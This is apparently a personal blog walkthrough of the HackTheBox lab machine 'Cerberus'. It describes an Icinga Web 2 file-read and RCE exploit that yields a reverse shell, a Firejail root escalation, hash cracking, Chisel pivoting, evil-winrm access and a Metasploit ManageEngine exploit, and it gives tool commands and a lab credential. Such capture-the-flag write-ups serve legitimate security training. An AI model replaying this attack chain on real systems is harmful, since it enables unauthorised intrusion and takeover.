HackTheBox : Cerberus
Intro : This is a really Hard Machine in HackTheBox. It took me 4 days to solve. Through the concept is easy. At first you get shell access with Icinga web 2 Exploit then you have to use Firejail to get root. After that you also have to use Pivoting to hack the main Windows Box then using ManageEngine Exploit you will get Admin access. So let’s start.
Nmap Scan :
As usual I start with a Simple Nmap Scan and I saw only one port is open : 8080(http).
Tip : nmap -sVC -Pn -T4 <ip> -vv
This reveals a domain name so I add it in my Host File.
Web Enumeration :
Then I simply visit the Web-Site. And I saw a ICINGA Login Page.
And I don’t know any Username and Paassword. So I use Google searching any Exploit available for ‘Icinga Web 2’. And I found this one Here.
It is saying using ‘lib/icinga/icinga-php-thirdparty’ this path we can read Arbitrary Files in the Machine. So I try for it.
First I try ‘/etc/passwd’. And I get it.
Then I check in Google for Icinga Web 2 config files. And I get this below.
The Path will be → /etc/icingaweb2/<file>
Then I try one by one. In ‘resources.ini’ file I get database user and password.
So then I use those Credentials to Login and I get the Dashboard Page.
Web Exploitation :
As I get Dashboard Page so I search in Google for any RCE Exploit exists for Icinga Web 2 to get Reverse Shell as any User. And I found this one working Properly.
So i try it. But to use it you have to make a ‘pem’ File in your VM.
I named it ssh.
So now let’s Test the Exploit.
Tip : python3 <name.py> -t <URL> -I <tun0_ip> -P <port> -u <name> -p <pass> -e <pem_file_name> (in my case it is ssh)
And in my Netcat Listener I get a Reverse Shell as www-data.
Then I upgrade my Shell (Try it yourself).
Root Access :
After that I ran ‘linpeas.sh’ in Victim’s Machine to Escalate Privilege.
And I get ‘Firejail’ binary present there.
So I search for it and get a Exploit Code Here. I copied and save it in my VM and send it to Victim’s Machine. Then I ran it.
I familiar about Firejail as it was Present in the previous HackTheBox Machine that I solve.
Then you have to join this session number above in another Terminal. And then you have to type ‘su -’.
And Game Finish we get Root Access.
But the Trick is we don’t hack any Windows Machine so we don’t get any User or Root Flag. So this is the Time we have to go into the Windows Machine.
User as Matthew :
Below I found some ldb Files. May here I found something with that I can get a Shell in Windows Machine.
I use strings command on the 1st File and I get a User Password Hash. Ha! Ha!
Then I cracked it using John. I have already cracked it.
Tip : john — wordlist=<path_to_rockyou> <has_file>
But how can I connect with Windows. So I checked for ‘/etc/hosts’ file to finding some clue. And I found an Internal IP is running with a Domain Name. May be it is the Windows IP. So we have to use Pivoting Method to access that IP Address.
Tip : 172.16.22.1 DC.cerberus.local DC cerberus.local
Here I used ‘Chisel’ an awesome Tool for Pivoting. You will get it from Here.
To use it you have to make a Server and Client Mode. Server in your VM and Client in Victim’s VM.
Tip : ./chisel server -p 8000 — reverse
I forward the Chisel Binary in Victim’s Machine also.
Now you can Access that IP Address. I use ‘evil-winrm’ to get access Windows Machine.
Tip : evil-winrm -i <tun0_ip> -u matthew -p <pass_we_got>
Note : Here we use tun0_ip because we use this IP for Pivoting.
Administrator Access :
It’s time for some PrivEsc. So I ran winpeas.exe file and get ManageEngine Service is present there. Here it is.
I search for any Exploit in Google and I found this Here.
I found an Exploit in Metasploit-Framework but it wants a GUID for Exploitation. So I search any Port running in the Windows Box.
Here are a Lot. So I think some of the Ports I will forward using Port Forwarding. May be there are something Interesting.
So I again start my Chisel Server in my VM.
Note : You have to download a Windows based Chisel to run it in Windows otherwise it will not work. But in your VM you will run Linux bases Chisel. You will find all Binary File Here.
We will access it with our localhost. As the IP has a domain name → DC.cerberus.local so we have to add it in our Host File to access it.
I forward these Ports in my VM → 8001, 80, 8888, 9251.
In Port 9251 I get a Login page like this Below.
Tip : localhost:9251 (In Browser)
I use this Creds → matthew@cerberus.local : 147258369.
After Login through the Page not showing Anything but I got the GUID which I want for Exploitation. The last one of URL is GUID.
Then I start msfconsole and search for manageengine.
And I use this Exploit. Exploit Number may be Different.
Then you have to set some Options as Below.
Then I type Exploit and suddenly I get a Meterpreter Session as Administrator.
And in Administrator Desktop I get the Root Flag.
Yaaaaaa!! At last we pawned the Machine. I learn really New things from this Machine. Thanks to Creator! Meet with you in my next Blog.
THANKS FOR READING!
If you like it don’t Forget to follow me for More Articles.
Happy Hacking~
